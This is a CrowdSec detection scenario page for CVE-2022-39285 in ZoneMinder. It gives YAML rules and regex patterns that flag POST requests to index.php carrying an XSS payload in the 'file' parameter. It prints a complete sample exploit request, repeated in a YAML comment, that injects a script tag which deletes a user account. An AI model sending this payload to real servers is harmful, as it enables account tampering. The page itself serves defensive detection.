zoneminder_cve-2022-39285 Scenario

Scenario to detect exploitation attempts of CVE-2022-39285. Basically do not allow any POST requests for index.php to have file=[XSS payload]. This is for ZM versions BEFORE 1.36.27, 1.37.24

POST /zm/index.php HTTP/1.1
Host: 10.0.10.107
Content-Length: 377
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.0.10.107
Referer: http://10.0.10.107/zm/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: zmSkin=classic; zmCSS=base; zmBandwidth=high; ZMSESSID=rauh5oe3i2uar25eaniipq2gie
Connection: close

__csrf_magic=key:78ee298a4593243b9ac481199d7da468bab4f044,1664675125&view=request&request=log&task=create&level=ERR&message=Trenches%20of%20IT%5Bname%5D=Chrome&browser%5Bversion%5D=101.0.4951.41&browser%5Bplatform%5D=Windows&file=http%3A%2F%2F10.0.10.107%2Fzm%2F&lt;/td&gt;&lt;/tr&gt;&lt;script src='/zm/?view=options%26tab=users%26action=delete%26markUids%5B%5D=6%26deleteBtn=Delete'&lt;/script&gt;&line=70

⚠️ Crowdsec is not a WAF and, as such, bypass to those signatures are likely ⚠️

1type: trigger

2format: 2.0

3#debug: true

4# file=http%3A%2F%2F10.0.10.107%2Fzm%2F</td></tr><script src='/zm/?view=options%26tab=users%26action=delete%26markUids%5B%5D=6%26deleteBtn=Delete'</script>&line=70

5name: baudneo/zoneminder_cve-2022-39285

6description: "Detect cve-2022-39285 exploitation attempts"

7filter: |

8 evt.Meta.log_type in ["http_access-log", "http_error-log"]

9 and

10 (

11 ( Upper(evt.Meta.http_verb) == "POST" and

12 Upper(evt.Meta.http_path) matches Upper('^(?P<path>/.*index.php)?.*(?P<file_query>file=.*</td></tr(?P<payload>.*)>)')

13 )

14 or

15 Upper(evt.Parsed.rawrequest) matches Upper('^(?P<verb>POST) (?P<path>/.*index.php)?.*(?P<file_query>file=.*</td></tr(?P<payload>.*)>)')

16 )

17groupby: "evt.Meta.source_ip"

18blackhole: 2m

19labels:

20 remediation: true

21 classification:

22 - attack.T1595

23 - attack.T1190

24 - cve.CVE-2022-39285

25 spoofable: 0

26 confidence: 3

27 service: zoneminder

28 behavior: "http:exploit"

29 label: "Zoneminder CVE-2022-39285"

Hub configuration

« zoneminder_cve-2022-39285 »
v0.2 by baudneo
Attack scenarioremediation:trueservice:zoneminderspoofable:0MITRE:T1595MITRE:T1190confidence:3

Hub configuration

« zoneminder_cve-2022-39285 »v0.2 by baudneoAttack scenarioremediation:trueservice:zoneminderCVE-2022-39285spoofable:0MITRE:T1595MITRE:T1190confidence:3

« zoneminder_cve-2022-39285 »
v0.2 by baudneo
Attack scenarioremediation:trueservice:zoneminderspoofable:0MITRE:T1595MITRE:T1190confidence:3